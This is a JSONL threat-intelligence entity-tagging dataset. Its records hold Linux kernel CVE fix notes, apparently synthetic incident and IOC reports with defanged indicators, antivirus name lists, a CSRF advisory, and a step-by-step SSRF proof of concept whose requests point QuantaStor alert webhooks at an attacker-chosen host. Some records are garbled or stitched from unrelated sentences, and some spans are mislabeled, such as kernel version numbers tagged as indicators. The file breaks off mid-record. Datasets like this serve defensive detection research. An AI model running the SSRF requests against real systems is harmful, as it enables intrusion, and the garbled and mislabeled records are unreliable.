{"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nscsi: ses: Handle enclosure with just a primary component gracefully\n\nThis reverts commit 3fe97ff3d949 (\"scsi: ses: Don't attach if enclosure\nhas no components\") and introduces proper handling of case where there are\nno detected secondary components, but primary component (enumerated in\nnum_enclosures) does exist. That fix was originally proposed by Ding Hui\n<dinghui@sangfor[.]com.cn>.\n\nCompletely ignoring devices that have one primary enclosure and no\nsecondary one results in ses_intf_add() bailing completely\n\n\tscsi 2:0:0:254: enclosure has no enumerated components\n        scsi 2:0:0:254: Failed to bind enclosure -12ven in valid configurations such\n\neven on valid configurations with 1 primary and 0 secondary enclosures as\nbelow:\n\n\t# sg_ses /dev/sg0\n\t  3PARdata  SES               3321\n\tSupported diagnostic pages:\n\t  Supported Diagnostic Pages [sdp] [0x0]\n\t  Configuration (SES) [cf] [0x1]\n\t  Short Enclosure Status (SES) [ses] [0x8]\n\t# sg_ses -p cf /dev/sg0\n\t  3PARdata  SES               3321\n\tConfiguration diagnostic page:\n\t  number of secondary subenclosures: 0\n\t  generation code: 0x0\n\t  enclosure descriptor list\n\t    Subenclosure identifier: 0 [primary]\n\t      relative ES process id: 0, number of ES processes: 1\n\t      number of type descriptor headers: 1\n\t      enclosure logical identifier (hex): 20000002ac02068d\n\t      enclosure vendor: 3PARdata  product: VV                rev: 3321\n\t  type descriptor header and text list\n\t    Element type: Unspecified, subenclosure id: 0\n\t      number of possible elements: 1\n\nThe changelog for the original fix follows\n\n=====\nWe can get a crash when disconnecting the iSCSI session,\nthe call trace like this:\n\n  [ffff00002a00fb70] kfree at ffff00000830e224\n  [ffff00002a00fba0] ses_intf_remove at ffff000001f200e4\n  [ffff00002a00fbd0] device_del at ffff0000086b6a98\n  [ffff00002a00fc50] device_unregister at ffff0000086b6d58\n  [ffff00002a00fc70] __scsi_remove_device at ffff00000870608c\n  [ffff00002a00fca0] scsi_remove_device at ffff000008706134\n  [ffff00002a00fcc0] __scsi_remove_target at ffff0000087062e4\n  [ffff00002a00fd10] scsi_remove_target at ffff0000087064c0\n  [ffff00002a00fd70] __iscsi_unbind_session at ffff000001c872c4\n  [ffff00002a00fdb0] process_one_work at ffff00000810f35c\n  [ffff00002a00fe00] worker_thread at ffff00000810f648\n  [ffff00002a00fe70] kthread at ffff000008116e98\n\nIn ses_intf_add, components count could be 0, and kcalloc 0 size scomp,\nbut not saved in edev->component[i].scratch\n\nIn this situation, edev->component[0].scratch is an invalid pointer,\nwhen kfree it in ses_intf_remove_enclosure, a crash like above would happen\nThe call trace also could be other random cases when kfree cannot catch\nthe invalid pointer\n\nWe should not use edev->component[] array when the components count is 0\nWe also need check index when use edev->component[] array in\nses_enclosure_data_process\n=====", "spans": {"Indicator: sangfor.com": [[439, 452]], "System: Linux kernel": [[7, 19]]}, "info": {"source": "defanged_augment", "cve_id": "CVE-2023-53431"}}
{"text": "Forensic Investigation Notes: Analysis of the compromised host revealed PowerView artifacts at C:\\Users\\admin\\AppData\\Local\\Temp\\agent.py. Memory dump analysis confirmed execution of Merlin. Registry modifications pointed to persistence via C:\\Users\\Public\\Documents\\taskhost.exe. Network forensics identified connections to 172[.]215[.]146[.]103 and backup-sync[ . ]io. Email headers traced the initial vector to hr@identity-verify[.]cc. File C:\\Program Files\\Common Files\\beacon.dll (SHA1: d4cfddc3707f93cd9943b40bef9a7904d87bdd54) was identified as the initial dropper. A staging URL hxxp://datacloud[.]org/collect resolved to 60[.]200[.]175[.]98. Secondary artifact hash: SHA1: 2e074bd8e65aa52f3c7e4590c7e0c7eb865cab7b.", "spans": {"Indicator: 172.215.146.103": [[325, 346]], "Indicator: backup-sync.io": [[351, 369]], "Indicator: hr@identity-verify.cc": [[414, 437]], "Indicator: d4cfddc3707f93cd9943b40bef9a7904d87bdd54": [[492, 532]], "Indicator: hxxp://datacloud.org/collect": [[587, 617]], "Indicator: 60.200.175.98": [[630, 649]], "Indicator: 2e074bd8e65aa52f3c7e4590c7e0c7eb865cab7b": [[682, 722]]}, "info": {"id": "synth_v2_01290", "source": "defanged_augment"}}
{"text": "A backdoor also known as: Win32.LovGate.W@mm W32.LovGate.W Win32.LovGate.W@mm Spyware.PasswordStealer W32/Lovgate.W@M Win32.LovGate.E8C19A WORM_LOVGATE.BJ Win32.Trojan.WisdomEyes.16070401.9500.9982 W32/Lovgate.W@mm W32.HLLW.Lovgate.I@mm Win32/Lovgate.AX WORM_LOVGATE.BJ Win.Worm.Lovgate-35 Win32.LovGate.W@mm Trojan.Win32.MultiPacked.dgpeeo Win32.Worm-email.Lovgate.Dwsv Win32.HLLM.Lovgate.based Worm.LovGate.Win32.79 BehavesLike[.]Win32[.]PWSZbot[.]cc W32/Lovgate.W@mm I-Worm/Supkp.a WORM/Lovgate.BK Worm[Email]/Win32.LovGate Worm:Win32/Lovgate.W@mm W32.W.LovGate.kYPD Win32.LovGate.W@mm Win32/LovGate.worm.179200 W32/Lovgate.w@M Worm.Lovgate I-Worm.Lovgate.AP Win32/Lovgate.AP I-Worm.Lovgate.BI Worm.Win32.Lovgate Win32.LovGate.W@mm", "spans": {"Malware: backdoor": [[2, 10]], "Indicator: BehavesLike.Win32.PWSZbot.cc": [[418, 452]]}, "info": {"id": "cyner2_train_002803", "source": "defanged_augment"}}
{"text": "Initiating the MQTT client . APT33 has targeted organizations – spanning multiple industries – headquartered in the United States , Saudi Arabia and South Korea . The attackers rely heavily on Microsoft technologies on both the client and server sides: the Trojan uses standard Windows utilities like Microsoft Background Intelligent Transfer Service (BITS ) bitsadmin[ . ]exe to receive commands and exfiltrate . Germany retained its place as the fourth most attacked country in the world , and the most attacked country outside of the anglosphere .", "spans": {"Organization: spanning multiple industries": [[64, 92]], "Organization: Microsoft": [[193, 202]], "System: Windows": [[278, 285]], "Indicator: bitsadmin.exe": [[359, 376]]}, "info": {"id": "cyberner_stix_train_005999", "source": "defanged_augment"}}
{"text": "A backdoor also known as: Trojan.Dos.Bonk.C DoS.Win32.Bonk!O Dos.Bonk Win32.Trojan.Bonk.Tcwa W32/Tool.FPXO-2436 DoS.Win32.Bonk.c Trojan.Dos.Bonk.C Trojan.Win32.Bonk.ddda TrojWare.Win32.DoS.Bonk.C Trojan.Dos.Bonk.C Trojan.Inject.654 BehavesLike.Win32.ExploitMydoom.mm Backdoor.Win32.HacDef W32/VirTool[.]RO TR/RedCap.kudtu DoS:Win32/Bonk.C Trojan.Dos.Bonk.C DoS.Win32.Bonk.c Trojan.Dos.Bonk.C Trojan.Asthma.23305 Trojan.Dos.Bonk.C Trojan.Dos.Bonk.C Win32/DoS.Bonk.C DoS.Bonk!CFlP7tiJI8A DoS/Bonk.A", "spans": {"Malware: backdoor": [[2, 10]], "Indicator: VirTool.RO": [[293, 305]]}, "info": {"id": "cyner2_train_007680", "source": "defanged_augment"}}
{"text": "Malware Analysis Report: RedLine Stealer (SHA256: 3f40ba9425e052fa584e61e52a675e31fc129fcc97e7045d280c74e59e48fa39). Upon execution on Atlassian Confluence, the sample creates C:\\ProgramData\\chrome_helper.exe and injects into legitimate processes. Network analysis shows beaconing to 5[.]57[.]97[.]149 every 60 seconds and DNS queries to nodeedge[ . ]info. The second stage was fetched from hxxps://portal-static[ . ]club/wp-content/uploads/doc.php and written to C:\\Users\\admin\\Desktop\\backdoor.elf. The payload uses CrackMapExec-style techniques for defense evasion. A secondary hash (SHA256: ccbaad49c780271950c3fd3a226c39f39b7ee834befa66f167e4e9c4dd971f52) was extracted from the unpacked payload.", "spans": {"Malware: RedLine Stealer": [[25, 40]], "Indicator: 3f40ba9425e052fa584e61e52a675e31fc129fcc97e7045d280c74e59e48fa39": [[50, 114]], "System: Atlassian Confluence": [[135, 155]], "Indicator: 5.57.97.149": [[284, 301]], "Indicator: nodeedge.info": [[338, 355]], "Indicator: hxxps://portal-static.club/wp-content/uploads/doc.php": [[391, 448]], "Indicator: ccbaad49c780271950c3fd3a226c39f39b7ee834befa66f167e4e9c4dd971f52": [[595, 659]]}, "info": {"id": "synth_v2_00513", "source": "defanged_augment"}}
{"text": "Incident Response Summary: On detection of anomalous traffic to 192[.]127[.]29[.]20, the Kaspersky GReAT IR team identified WarmCookie running as C:\\Users\\admin\\Desktop\\beacon.dll. The threat actor, believed to be OilRig, used BloodHound for credential harvesting and GhostPack for lateral movement. Exfiltrated data was sent to storage-mail[ . ]cc and backup-login[ . ]cc. The initial dropper (SHA256: ef8433053b43f225c848eb78a7ff6b4d51a913eac8c2be1d8926f124e35e075a) was delivered via a phishing email from confirm@login-portal[.]tech. A second C2 node was observed at 10[.]224[.]92[.]73, with a persistence mechanism writing to C:\\Users\\Public\\Documents\\chrome_helper.exe.", "spans": {"Indicator: 192.127.29.20": [[64, 83]], "Organization: Kaspersky GReAT": [[89, 104]], "Malware: WarmCookie": [[124, 134]], "Indicator: storage-mail.cc": [[329, 348]], "Indicator: backup-login.cc": [[353, 372]], "Indicator: ef8433053b43f225c848eb78a7ff6b4d51a913eac8c2be1d8926f124e35e075a": [[403, 467]], "Indicator: confirm@login-portal.tech": [[509, 536]], "Indicator: 10.224.92.73": [[571, 589]]}, "info": {"id": "synth_v2_00415", "source": "defanged_augment"}}
{"text": "Vulnerability Advisory: CVE-2024-35928 is a critical integer overflow affecting Juniper SRX. Google TAG confirmed active exploitation by Lazarus Group in the wild. Exploitation delivers AgentTesla (SHA1: c583be68a3bc16a1e28b06ec4d22afdcf6155c63) which is dropped to C:\\Users\\admin\\Downloads\\helper.sh. The exploit payload is hosted at hxxp://static-login[.]com/api/v2/auth and communicates to 172 [ . ] 236 [ . ] 237 [ . ] 228 for C2.", "spans": {"Vulnerability: CVE-2024-35928": [[24, 38]], "Vulnerability: integer overflow": [[53, 69]], "System: Juniper SRX": [[80, 91]], "Organization: Google TAG": [[93, 103]], "Malware: AgentTesla": [[186, 196]], "Indicator: c583be68a3bc16a1e28b06ec4d22afdcf6155c63": [[204, 244]], "Indicator: http://static-login.com/api/v2/auth": [[335, 372]], "Indicator: 172.236.237.228": [[393, 426]]}, "info": {"id": "synth_v2_00804", "source": "defanged_augment"}}
{"text": "Artifact Analysis for Gootloader campaign:\nStage 1 dropper at C:\\Users\\admin\\Downloads\\csrss.exe - MD5: 6b8d6e70f6a2283fc7bcb17bfca371d8\nStage 2 loader at C:\\Users\\admin\\Downloads\\payload.bin - SHA1: 9881716b7d79f524c60379231d01b0a4ed5512f5\nFinal payload at C:\\Users\\admin\\Downloads\\winlogon.exe - MD5: 689a8649ed097c1fb10f6f1fbab07817\nExfiltration module - SHA1: 2ebec8343f49a76a00e10bdc7efbe4275a02009e\nAll stages communicated with 87 [ . ] 142 [ . ] 253 [ . ] 97. Havoc signatures detected in Stage 2.", "spans": {"Malware: Gootloader": [[22, 32]], "Indicator: 6b8d6e70f6a2283fc7bcb17bfca371d8": [[104, 136]], "Indicator: 9881716b7d79f524c60379231d01b0a4ed5512f5": [[200, 240]], "Indicator: 689a8649ed097c1fb10f6f1fbab07817": [[303, 335]], "Indicator: 2ebec8343f49a76a00e10bdc7efbe4275a02009e": [[364, 404]], "Indicator: 87.142.253.97": [[434, 465]]}, "info": {"id": "synth_v2_01946", "source": "defanged_augment"}}
{"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nACPI: CPPC: Use access_width over bit_width for system memory accesses\n\nTo align with ACPI 6.3+, since bit_width can be any 8-bit value, it\ncannot be depended on to be always on a clean 8b boundary. This was\nuncovered on the Cobalt 100 platform.\n\nSError Interrupt on CPU26, code 0xbe000011 -- SError\n CPU: 26 PID: 1510 Comm: systemd-udevd Not tainted 5[.]15[.]2[.]1-13 #1\n Hardware name: MICROSOFT CORPORATION, BIOS MICROSOFT CORPORATION\n pstate: 62400009 (nZCv daif +PAN -UAO +TCO -DIT -SSBS BTYPE=--)\n pc : cppc_get_perf_caps+0xec/0x410\n lr : cppc_get_perf_caps+0xe8/0x410\n sp : ffff8000155ab730\n x29: ffff8000155ab730 x28: ffff0080139d0038 x27: ffff0080139d0078\n x26: 0000000000000000 x25: ffff0080139d0058 x24: 00000000ffffffff\n x23: ffff0080139d0298 x22: ffff0080139d0278 x21: 0000000000000000\n x20: ffff00802b251910 x19: ffff0080139d0000 x18: ffffffffffffffff\n x17: 0000000000000000 x16: ffffdc7e111bad04 x15: ffff00802b251008\n x14: ffffffffffffffff x13: ffff013f1fd63300 x12: 0000000000000006\n x11: ffffdc7e128f4420 x10: 0000000000000000 x9 : ffffdc7e111badec\n x8 : ffff00802b251980 x7 : 0000000000000000 x6 : ffff0080139d0028\n x5 : 0000000000000000 x4 : ffff0080139d0018 x3 : 00000000ffffffff\n x2 : 0000000000000008 x1 : ffff8000155ab7a0 x0 : 0000000000000000\n Kernel panic - not syncing: Asynchronous SError Interrupt\n CPU: 26 PID: 1510 Comm: systemd-udevd Not tainted\n5 [ . ] 15 [ . ] 2 [ . ] 1-13 #1\n Hardware name: MICROSOFT CORPORATION, BIOS MICROSOFT CORPORATION\n Call trace:\n  dump_backtrace+0x0/0x1e0\n  show_stack+0x24/0x30\n  dump_stack_lvl+0x8c/0xb8\n  dump_stack+0x18/0x34\n  panic+0x16c/0x384\n  add_taint+0x0/0xc0\n  arm64_serror_panic+0x7c/0x90\n  arm64_is_fatal_ras_serror+0x34/0xa4\n  do_serror+0x50/0x6c\n  el1h_64_error_handler+0x40/0x74\n  el1h_64_error+0x7c/0x80\n  cppc_get_perf_caps+0xec/0x410\n  cppc_cpufreq_cpu_init+0x74/0x400 [cppc_cpufreq]\n  cpufreq_online+0x2dc/0xa30\n  cpufreq_add_dev+0xc0/0xd4\n  subsys_interface_register+0x134/0x14c\n  cpufreq_register_driver+0x1b0/0x354\n  cppc_cpufreq_init+0x1a8/0x1000 [cppc_cpufreq]\n  do_one_initcall+0x50/0x250\n  do_init_module+0x60/0x27c\n  load_module+0x2300/0x2570\n  __do_sys_finit_module+0xa8/0x114\n  __arm64_sys_finit_module+0x2c/0x3c\n  invoke_syscall+0x78/0x100\n  el0_svc_common.constprop.0+0x180/0x1a0\n  do_el0_svc+0x84/0xa0\n  el0_svc+0x2c/0xc0\n  el0t_64_sync_handler+0xa4/0x12c\n  el0t_64_sync+0x1a4/0x1a8\n\nInstead, use access_width to determine the size and use the offset and\nwidth to shift and mask the bits to read/write out. Make sure to add a\ncheck for system memory since pcc redefines the access_width to\nsubspace id.\n\nIf access_width is not set, then fall back to using bit_width.\n\n[ rjw: Subject and changelog edits, comment adjustments ]", "spans": {"Indicator: 5.15.2.1": [[420, 434], [1447, 1473]], "System: Linux kernel": [[7, 19]], "System: systemd": [[394, 401], [1421, 1428]]}, "info": {"source": "defanged_augment", "cve_id": "CVE-2024-35995"}}
{"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nnfsd: map the EBADMSG to nfserr_io to avoid warning\n\nExt4 will throw -EBADMSG through ext4_readdir when a checksum error\noccurs, resulting in the following WARNING.\n\nFix it by mapping EBADMSG to nfserr_io.\n\nnfsd_buffered_readdir\n iterate_dir // -EBADMSG -74\n  ext4_readdir // .iterate_shared\n   ext4_dx_readdir\n    ext4_htree_fill_tree\n     htree_dirblock_to_tree\n      ext4_read_dirblock\n       __ext4_read_dirblock\n        ext4_dirblock_csum_verify\n         warn_no_space_for_csum\n          __warn_no_space_for_csum\n        return ERR_PTR(-EFSBADCRC) // -EBADMSG -74\n nfserrno // WARNING\n\n[  161.115610] ------------[ cut here ]------------\n[  161.116465] nfsd: non-standard errno: -74\n[  161.117315] WARNING: CPU: 1 PID: 780 at fs/nfsd/nfsproc.c:878 nfserrno+0x9d/0xd0\n[  161.118596] Modules linked in:\n[  161.119243] CPU: 1 PID: 780 Comm: nfsd Not tainted 5.10.0-00014-g79679361fd5d #138\n[  161.120684] Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS rel-1.14.0-0-g155821a1990b-prebuilt.qe\nmu[ . ]org 04/01/2014\n[  161.123601] RIP: 0010:nfserrno+0x9d/0xd0\n[  161.124676] Code: 0f 87 da 30 dd 00 83 e3 01 b8 00 00 00 05 75 d7 44 89 ee 48 c7 c7 c0 57 24 98 89 44 24 04 c6\n 05 ce 2b 61 03 01 e8 99 20 d8 00 <0f> 0b 8b 44 24 04 eb b5 4c 89 e6 48 c7 c7 a0 6d a4 99 e8 cc 15 33\n[  161.127797] RSP: 0018:ffffc90000e2f9c0 EFLAGS: 00010286\n[  161.128794] RAX: 0000000000000000 RBX: 0000000000000000 RCX: 0000000000000000\n[  161.130089] RDX: 1ffff1103ee16f6d RSI: 0000000000000008 RDI: fffff520001c5f2a\n[  161.131379] RBP: 0000000000000022 R08: 0000000000000001 R09: ffff8881f70c1827\n[  161.132664] R10: ffffed103ee18304 R11: 0000000000000001 R12: 0000000000000021\n[  161.133949] R13: 00000000ffffffb6 R14: ffff8881317c0000 R15: ffffc90000e2fbd8\n[  161.135244] FS:  0000000000000000(0000) GS:ffff8881f7080000(0000) knlGS:0000000000000000\n[  161.136695] CS:  0010 DS: 0000 ES: 0000 CR0: 0000000080050033\n[  161.137761] CR2: 00007fcaad70b348 CR3: 0000000144256006 CR4: 0000000000770ee0\n[  161.139041] DR0: 0000000000000000 DR1: 0000000000000000 DR2: 0000000000000000\n[  161.140291] DR3: 0000000000000000 DR6: 00000000fffe0ff0 DR7: 0000000000000400\n[  161.141519] PKRU: 55555554\n[  161.142076] Call Trace:\n[  161.142575]  ? __warn+0x9b/0x140\n[  161.143229]  ? nfserrno+0x9d/0xd0\n[  161.143872]  ? report_bug+0x125/0x150\n[  161.144595]  ? handle_bug+0x41/0x90\n[  161.145284]  ? exc_invalid_op+0x14/0x70\n[  161.146009]  ? asm_exc_invalid_op+0x12/0x20\n[  161.146816]  ? nfserrno+0x9d/0xd0\n[  161.147487]  nfsd_buffered_readdir+0x28b/0x2b0\n[  161.148333]  ? nfsd4_encode_dirent_fattr+0x380/0x380\n[  161.149258]  ? nfsd_buffered_filldir+0xf0/0xf0\n[  161.150093]  ? wait_for_concurrent_writes+0x170/0x170\n[  161.151004]  ? generic_file_llseek_size+0x48/0x160\n[  161.151895]  nfsd_readdir+0x132/0x190\n[  161.152606]  ? nfsd4_encode_dirent_fattr+0x380/0x380\n[  161.153516]  ? nfsd_unlink+0x380/0x380\n[  161.154256]  ? override_creds+0x45/0x60\n[  161.155006]  nfsd4_encode_readdir+0x21a/0x3d0\n[  161.155850]  ? nfsd4_encode_readlink+0x210/0x210\n[  161.156731]  ? write_bytes_to_xdr_buf+0x97/0xe0\n[  161.157598]  ? __write_bytes_to_xdr_buf+0xd0/0xd0\n[  161.158494]  ? lock_downgrade+0x90/0x90\n[  161.159232]  ? nfs4svc_decode_voidarg+0x10/0x10\n[  161.160092]  nfsd4_encode_operation+0x15a/0x440\n[  161.160959]  nfsd4_proc_compound+0x718/0xe90\n[  161.161818]  nfsd_dispatch+0x18e/0x2c0\n[  161.162586]  svc_process_common+0x786/0xc50\n[  161.163403]  ? nfsd_svc+0x380/0x380\n[  161.164137]  ? svc_printk+0x160/0x160\n[  161.164846]  ? svc_xprt_do_enqueue.part.0+0x365/0x380\n[  161.165808]  ? nfsd_svc+0x380/0x380\n[  161.166523]  ? rcu_is_watching+0x23/0x40\n[  161.167309]  svc_process+0x1a5/0x200\n[  161.168019]  nfsd+0x1f5/0x380\n[  161.168663]  ? nfsd_shutdown_threads+0x260/0x260\n[  161.169554]  kthread+0x1c4/0x210\n[  161.170224]  ? kthread_insert_work_sanity_check+0x80/0x80\n[  161.171246]  ret_from_fork+0x1f/0x30", "spans": {"Indicator: mu.org": [[1075, 1085]], "System: Linux kernel": [[7, 19]], "System: QEMU": [[991, 995]]}, "info": {"source": "defanged_augment", "cve_id": "CVE-2024-49875"}}
{"text": "IOC Bulletin - BumbleBee Campaign:\nNetwork Indicators:\n- 193 [ . ] 118 [ . ] 16 [ . ] 142\n- 27[.]107[.]54[.]148\n- 148[.]193[.]254[.]18\n- login-auth[ . ]xyz\n- mail-backup[ . ]org\nURLs:\n- hxxps://securemail[ . ]top/api/v2/auth\n- hxxps://cache-cdn[.]xyz/collect\nEmail Senders:\n- finance@phishing-domain[.]com\n- notification@mail-service[.]info\nFile Indicators:\n- SHA1: 783cc21132fb7b32668322156eb608431693f540\n- SHA1: f3d579b1abaca1884c1d0d7f5253ed18094bdc6e\n- Drop path: C:\\Users\\admin\\Downloads\\shell.php", "spans": {"Malware: BumbleBee": [[15, 24]], "Indicator: 193.118.16.142": [[57, 89]], "Indicator: 27.107.54.148": [[92, 111]], "Indicator: 148.193.254.18": [[114, 134]], "Indicator: login-auth.xyz": [[137, 155]], "Indicator: mail-backup.org": [[158, 177]], "Indicator: hxxps://securemail.top/api/v2/auth": [[186, 224]], "Indicator: https://cache-cdn.xyz/collect": [[227, 258]], "Indicator: finance@phishing-domain.com": [[276, 305]], "Indicator: notification@mail-service.info": [[308, 340]], "Indicator: 783cc21132fb7b32668322156eb608431693f540": [[366, 406]], "Indicator: f3d579b1abaca1884c1d0d7f5253ed18094bdc6e": [[415, 455]]}, "info": {"id": "synth_v2_01474", "source": "defanged_augment"}}
{"text": "An authenticated administrator is able to prepare an alert that is able to execute an SSRF attack. This is exclusively with POST requests.\n\nPOC\n\nStep 1: Prepare the SSRF with a request like this:\n\nGET /qstorapi/alertConfigSet?senderEmailAddress=a&smtpServerIpAddress=BURPCOLLABHOST&smtpServerPort=25&smtpUsername=a&smtpPassword=1&smtpAuthType=1&customerSupportEmailAddress=1&poolFreeSpaceWarningThreshold=1&poolFreeSpaceAlertThreshold=1&poolFreeSpaceCriticalAlertThreshold=1&pagerDutyServiceKey=1&slackWebhookUrl=http://<target>&enableAlertTypes&enableAlertTypes=1&disableAlertTypes=1&pauseAlertTypes=1&mattermostWebhookUrl=http://<TARGET>\nHTTP/1.1\n\nHost: <HOSTNAME> \nAccept-Encoding: gzip, deflate\n\nAccept: */*\nAccept-Language: en\n\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.114 Safari/537.36\n\nConnection: close\n\nauthorization: Basic <BASIC_AUTH_HASH> \nContent-Type: application/json\n\nContent-Length: 0\n\nStep 2: Trigger this alert with this request\n\nGET /qstorapi/alertRaise?title=test&message=test&severity=1 \nHTTP/1.1\n\nHost: <HOSTNAME> \nAccept-Encoding: gzip, deflate\n\nAccept: */*\n\nAccept-Language: en\n\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.114 Safari/537.36\n\nConnection: close\n\nauthorization: Basic <BASIC_AUTH_HASH> \nContent-Type: application/json\n\nContent-Length: 1\n\nThe post request received by <TARGET> looks like this:\n{\n \n### Python FLASK stuff ####\n\n 'endpoint': 'index', \n \n'method': 'POST', \n \n'cookies': ImmutableMultiDict([]), \n \n### END Python FLASK stuff ####\n\n \n'data': b'{ \n  \"attachments\": [ \n   {\n\n    \"fallback\": \"[122] test / test.\",\n\n    \"color\": \"#aa2222\",\n\n    \"title\": \"[122] test\",\n\n    \"text\": \"test\",\n\n    \"fields\": [   \n     {    \n\n      \"title\": \"Alert Severity\",\n        \n      \"value\": \"CRITICAL\",\n        \n      \"short\": false  \n     },  {   \n      \"title\": \"Appliance\",     \n      \"value\": \"quantastor (https://<HOSTNAME>)\",\n      \n      \"short\": true  \n\n     },  {    \n\n      \"title\": \"System / Driver / Kernel Ver\",    \n\n      \"value\": \"5 [ . ] 10 [ . ] 0 [ . ] 156+a25eaacef / scst-3.5.0-pre / 5.3.0-62-generic\",    \n\n      \"short\": false  \n\n     },  {    \n\n      \"title\": \"System Startup\",    \n\n      \"value\": \"Fri Aug  6 16-02-55 2021\",    \n\n      \"short\": true  \n\n          },  {    \n\n      \"title\": \"SSID\",    \n\n      \"value\": \"f4823762-1dd1-1333-47a0-6238c474a7e7\",    \n\n      \"short\": true  \n\n     },\n    ],\n\n    \"footer\": \"QuantaStor Call-home Alert\",\n\n    \"footer_icon\": \" hxxps://platform[ . ]slack-edge[ . ]com/img/default_application_icon.png \",\n\n    \"ts\": 1628461774\n   }\n  ], \n  \"mrkdwn\":true \n }', \n #### FLASK REQUEST STUFF #####\n\n 'headers': {\n\n  'Host': '<redacted>', \n  'User-Agent': 'curl/7.58.0', \n  'Accept': '*/*', \n  'Content-Type': 'application/json', \n  'Content-Length': '790'\n\n }, \n 'args': ImmutableMultiDict([]), \n 'form': ImmutableMultiDict([]), \n 'remote_addr': '217 [ . ] 103 [ . ] 63 [ . ] 173', \n 'path': '/payload/58', \n 'whois_ip': 'TNF-AS, NL'\n}\n\n#### END FLASK REQUEST STUFF #####", "spans": {"Indicator: 5.10.0.156": [[2114, 2142]], "Indicator: 217.103.63.173": [[2972, 3004]], "Indicator: https://platform.slack-edge.com/img/default_application_icon.png": [[2559, 2631]], "System: Windows": [[758, 765], [1198, 1205]], "System: Safari": [[847, 853], [1287, 1293]], "System: Python": [[1475, 1481], [1592, 1598]], "System: curl": [[2781, 2785]], "Organization: Mozilla": [[745, 752], [1185, 1192]], "Vulnerability: SSRF": [[86, 90], [165, 169]]}, "info": {"source": "defanged_augment", "cve_id": "CVE-2021-42079"}}
{"text": "A backdoor also known as: W32.CpqEasyBttn.Worm Dropped:Win32.Worm.VB.NRV Email-Worm.Win32.VB!O Worm.Flewon.S349523 Win32.Worm.VB.ji Hacktool.Spammer Win32/Flewon.E WORM_VB.DHQ Win.Worm.Liamo-1 Dropped:Win32.Worm.VB.NRV Email-Worm.Win32.VB.cb Dropped:Win32.Worm.VB.NRV Trojan.Win32.VB.hpnv W32.W.AutoRun.l6mI Win32.Worm-email.Vb.Wqda Dropped:Win32.Worm.VB.NRV Dropped:Win32.Worm.VB.NRV Trojan.PWS.Asterie Worm.VB.Win32.303 WORM_VB.DHQ BehavesLike[ . ]Win32[ . ]VBObfus[ . ]ch TrojanClicker.Qihai.aq TR/Spy[.]Vwealer[.]KZ.33 Worm[Email]/Win32.VB Win32.Worm.VB.NRV I-Worm.Win32.VB.94208.E Email-Worm.Win32.VB.cb Worm:Win32/Flewon.A HEUR/Fakon.mwf Dropped:Win32.Worm.VB.NRV Trojan.VBRA.010583 Win32/VB.NGN I-Worm.VB.XYH Email-Worm.Win32.VB.cb W32/VB.CB@mm W32/MadCoffee.B.worm Win32/Trojan.Spy.bc3", "spans": {"Malware: backdoor": [[2, 10]], "Indicator: BehavesLike.Win32.VBObfus.ch": [[434, 474]], "Indicator: Spy.Vwealer.KZ": [[501, 519]]}, "info": {"id": "cyner2_train_001950", "source": "defanged_augment"}}
{"text": "Incident Response Summary: On detection of anomalous traffic to 10[.]11[.]117[.]233, the CrowdStrike IR team identified Raccoon Stealer running as C:\\ProgramData\\csrss.exe. The threat actor, believed to be Flax Typhoon, used Mythic for credential harvesting and BITSAdmin for lateral movement. Exfiltrated data was sent to cdn-portal[ . ]cc and staticsync[.]org. The initial dropper (SHA256: 942d91adb7bc1b10862d51ae3df475aa8c3c63f675e37c923c86df92e17b677d) was delivered via a phishing email from account@identity-verify[ . ]cc. A second C2 node was observed at 172 [ . ] 101 [ . ] 134 [ . ] 180, with a persistence mechanism writing to C:\\Users\\admin\\Downloads\\shell.php.", "spans": {"Indicator: 10.11.117.233": [[64, 83]], "Organization: CrowdStrike": [[89, 100]], "Malware: Raccoon Stealer": [[120, 135]], "Indicator: cdn-portal.cc": [[323, 340]], "Indicator: staticsync.org": [[345, 361]], "Indicator: 942d91adb7bc1b10862d51ae3df475aa8c3c63f675e37c923c86df92e17b677d": [[392, 456]], "Indicator: account@identity-verify.cc": [[498, 528]], "Indicator: 172.101.134.180": [[563, 596]]}, "info": {"id": "synth_v2_00262", "source": "defanged_augment"}}
{"text": "Incident Response Summary: On detection of anomalous traffic to 10 [ . ] 104 [ . ] 97 [ . ] 243, the ESET Research IR team identified ShadowPad running as C:\\Program Files\\Common Files\\payload.bin. The threat actor, believed to be Flax Typhoon, used PowerView for credential harvesting and PowerShell Empire for lateral movement. Exfiltrated data was sent to cloudstatic[ . ]xyz and cloudgateway[.]org. The initial dropper (MD5: 16691c4ed662f3cc59250951902b17bb) was delivered via a phishing email from report@credential-check[ . ]site. A second C2 node was observed at 74 [ . ] 253 [ . ] 195 [ . ] 34, with a persistence mechanism writing to C:\\Windows\\Temp\\agent.py.", "spans": {"Indicator: 10.104.97.243": [[64, 95]], "Organization: ESET Research": [[101, 114]], "Malware: ShadowPad": [[134, 143]], "Indicator: cloudstatic.xyz": [[359, 378]], "Indicator: cloudgateway.org": [[383, 401]], "Indicator: 16691c4ed662f3cc59250951902b17bb": [[429, 461]], "Indicator: report@credential-check.site": [[503, 535]], "Indicator: 74.253.195.34": [[570, 601]]}, "info": {"id": "synth_v2_00263", "source": "defanged_augment"}}
{"text": "### Impact In a CSRF attack, an innocent end user is tricked by an attacker into submitting a web request that they did not intend. This may cause actions to be performed on the website that can include inadvertent client or server data leakage, change of session state, or manipulation of an end user's account. ### Patch Upgrade to v2022.09.10 to patch this vulnerability. ### Workarounds Rebuild and redeploy the Orchest `auth-server` with this commit: hxxps://github[.]com/orchest/orchest/commit/c2587a963cca742c4a2503bce4cfb4161bf64c2d ### References hxxps://en[.]wikipedia[.]org/wiki/Cross-site_request_forgery hxxps://cwe[ . ]mitre[ . ]org/data/definitions/352.html ### For more information If you have any questions or comments about this advisory: * Open an issue in hxxps://github[ . ]com/orchest/orchest * Email us at rick@orchest[.]io", "spans": {"Indicator: https://github.com/orchest/orchest/commit/c2587a963cca742c4a2503bce4cfb4161bf64c2d": [[456, 540]], "Indicator: https://en.wikipedia.org/wiki/Cross-site_request_forgery": [[556, 616]], "Indicator: https://cwe.mitre.org/data/definitions/352.html": [[617, 672]], "Indicator: 